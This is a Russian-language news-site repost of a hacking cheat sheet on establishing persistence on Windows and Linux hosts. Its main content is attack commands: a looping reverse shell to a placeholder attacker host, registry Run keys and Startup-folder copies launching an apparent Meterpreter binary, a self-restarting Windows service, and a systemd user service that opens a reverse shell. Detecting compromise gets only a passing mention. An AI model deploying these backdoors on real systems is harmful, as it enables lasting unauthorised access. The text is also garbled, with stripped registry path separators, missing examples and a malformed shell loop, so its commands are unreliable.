Категория > Новости > Шпаргалка по persistence. Как надежно прописаться на хосте или выявить факт компрометации - «Новости»
Шпаргалка по persistence. Как надежно прописаться на хосте или выявить факт компрометации - «Новости»7-03-2021, 00:00. Автор: Рената |
Autoruns, результаты ты можешь наблюдать на скриншотах.ШеллОрганизовать персистентность можно прямо из командной строки. Чтобы шелл открывался всегда, используем команду с бесконечным циклом, уходящую в фон. Windows Вот как это работает в Windows:
Linux bash$> nohup bash -c "while :; do bash -i & /dev/tcp/attacker.tk/8888 0>&1; sleep 60; done" &
АвтозагрузкаГоворя о персистентности, нельзя пройти мимо классической и всем известной автозагрузки. Ее преимущество в том, что она будет работать с правами любого, даже неадминистративного пользователя. Windows cmd$>reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun"/v persistence /t REG_SZ /d "C:usersusernamemeter.exe"cmd#>copy meter.exe C:ProgramDataMicrosoftWindowsStart MenuProgramsStartupcmd#>reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun"/v persistence /t REG_SZ /d "C:Windowssystem32meter.exe" Linux
СервисыИспользовать службу для закрепления более выгодно, чем автозагрузку, так как Service Manager будет сам перезапускать службу, если потребуется. Для Windows создание службы потребует права администратора. cmd#>sc failure persistence reset= 0 actions= restart/60000/restart/60000/restart/60000 В Linux создать службу можно и с учетки простого пользователя. Вот варианты для рута и для простого пользователя. bash$> vim ~/.config/systemd/user/persistence.service Содержимое файла:
[Unit]
Description=persistence
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.tk/8888 0>&1'
Restart=always
RestartSec=60
[Install]
WantedBy=default.target
И запускаем созданную службу: bash#> systemctl start persistence.service
ЗадачиСоздание запланированной задачи — весьма удобный способ поддержания доступа. Заодно можно задать время и интервал запуска. Но делать это разрешено, как правило, только привилегированным пользователям. Перейти обратно к новости |